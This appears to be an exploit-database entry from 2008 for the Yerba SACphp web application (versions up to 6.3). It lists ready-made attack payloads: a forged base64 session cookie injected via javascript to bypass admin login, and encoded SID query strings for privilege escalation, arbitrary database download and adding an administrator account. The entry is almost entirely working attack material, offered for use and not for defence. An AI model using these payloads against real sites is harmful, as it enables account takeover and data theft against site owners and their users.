Yerba SACphp <= 6.3 Multiple Remote Vulnerabilities

2008-10-07T00:00:00
ID 1337DAY-ID-3847
Type zdt
Reporter StAkeR
Modified 2008-10-07T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===================================================
Yerba SACphp <= 6.3 Multiple Remote Vulnerabilities
===================================================


 [*]~======================================================~[*] 
 [*]   Yerba SACphp <= 6.3 Multiple Remote Vulnerabilities  [*]
 [*]~======================================================~[*]
 
 [?] Discovered By StAkeR 
 [?] Discovered On 07/10/2008
 [?] http://downloads.sourceforge.net/yerba/SACphp-6_28.tgz?modtime=1025222400&big_mirror=0

 [?] Admin Login ByPass
 [?] javascript:document.cookie="galleta[sesion]=MToxOkFkbWluaXN0cmFkb3IgZGVsIFNpc3RlbWE6Jw=="

 [?] Privilege Escalation 
 [?] index.php?SID=[path (base64 encoded)]

 [?] Arbitrary Database Download
 [?] index.php?SID=Jm9kbGFwc2VyPXhmJmFtZXRzaXM9cG9tJm5pbWRBQkR5PWRvbQ==

 [?] Arbitrary Add Admin 
 [?] index.php?SID=JnJhZ2VyZ2E9eGYmYW1ldHNpcz1wb20mc29pcmF1c1V5PWRvbQ==



#  0day.today [2018-04-02]  #